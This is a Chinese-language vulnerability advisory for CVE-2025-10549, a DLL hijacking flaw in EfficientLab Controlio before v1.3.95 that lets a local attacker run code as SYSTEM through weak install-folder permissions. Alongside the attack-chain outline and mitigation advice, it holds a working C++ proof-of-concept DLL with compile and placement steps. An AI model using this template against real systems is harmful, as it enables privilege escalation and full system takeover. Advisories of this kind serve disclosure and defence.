CVE-2025-10549 CVSS 5.1 中危

CVE-2025-10549 EfficientLab Controlio DLL劫持漏洞

披露日期: 2026-04-23

来源: 551230f0-3615-47bd-b7cc-93e92e730bbf

漏洞信息

漏洞编号

CVE-2025-10549

漏洞类型

DLL劫持

CVSS评分

5.1 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

EfficientLab Controlio

漏洞概述

EfficientLab Controlio 在 v1.3.95 之前的版本中存在一个 DLL 劫持漏洞。该漏洞的根本原因是安装目录中的文件夹权限设置过弱。由于受影响的服务以 NT AUTHORITY\SYSTEM 权限运行，本地攻击者可以将特制的 DLL 文件放置在此目录中。一旦应用程序尝试加载该 DLL，攻击者即可利用此漏洞以最高权限执行任意代码，从而完全控制受害系统。

技术细节

该漏洞属于典型的 DLL 劫持漏洞。当 Windows 程序启动时，它会按照特定顺序搜索所需的 DLL 文件。如果攻击者能够控制程序的搜索路径，并且该路径具有写入权限，攻击者就可以在该路径下放置一个恶意的 DLL 文件，该文件的名称与程序期望加载的合法 DLL 名称相同。

在 EfficientLab Controlio 的案例中，软件安装目录的权限配置不当，允许普通用户（甚至低权限用户）写入文件。由于 Controlio 的相关服务是以 NT AUTHORITY\SYSTEM 这一最高系统权限运行的，当服务启动或重启并尝试加载 DLL 时，它会优先加载攻击者植入的恶意 DLL，而不是系统目录下的合法 DLL。这将导致恶意代码在 SYSTEM 上下文中执行，攻击者借此可以提升权限、安装后门、窃取敏感数据或破坏系统完整性。尽管漏洞利用需要本地访问权限（AV:L）和高权限（PR:H），但在已被攻陷的内部网络中，这常被用于横向移动或权限维持。

攻击链分析

STEP 1

侦察

攻击者识别目标系统上安装了 EfficientLab Controlio 软件，并检查安装目录的权限配置，确认当前用户具有写入权限。

STEP 2

武器化

攻击者编写包含恶意载荷的 C/C++ 代码，并将其编译为动态链接库（DLL）文件。该 DLL 将在加载时执行任意代码。

STEP 3

投递

攻击者利用弱权限漏洞，将编译好的恶意 DLL 文件复制到 Controlio 的安装目录中，并重命名为目标应用程序尝试加载的 DLL 名称。

STEP 4

利用

等待 Controlio 服务重启或系统管理员触发相关功能。当应用程序尝试加载该 DLL 时，由于搜索顺序优先于系统目录，恶意 DLL 被加载。

STEP 5

执行

恶意代码以 NT AUTHORITY\SYSTEM 权限在系统上下文中运行，从而实现攻击者的目的（如权限提升、后门植入等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Compile: x86_64-w64-mingw32-g++ -shared -o hijack.dll payload.cpp
#include <windows.h>
#include <stdlib.h>

// DllMain entry point
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Execution starts here when the DLL is loaded
        // Example: Create a file as proof of execution (runs as NT AUTHORITY\SYSTEM)
        system("cmd.exe /c echo PoC Execution > C:\\Windows\\Temp\\cve_2025_10549.txt");
        // Practical attack: WinExec("calc.exe", SW_SHOW);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/*
Instructions:
1. Identify the missing DLL name the application tries to load (e.g., using Process Monitor).
2. Rename the compiled 'hijack.dll' to the identified DLL name.
3. Place the malicious DLL in the Controlio installation directory.
4. Restart the Controlio service or trigger the application flow.
*/

影响范围

EfficientLab Controlio < v1.3.95

防御指南

临时缓解措施

如果无法立即升级，应限制对 Controlio 安装目录的访问控制列表（ACL），仅允许 SYSTEM 和管理员组拥有完全控制权限，移除所有其他用户的写入权限。同时，可以使用端点检测与响应（EDR）工具监控安装目录下文件的创建和修改行为，以及非预期进程的启动。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表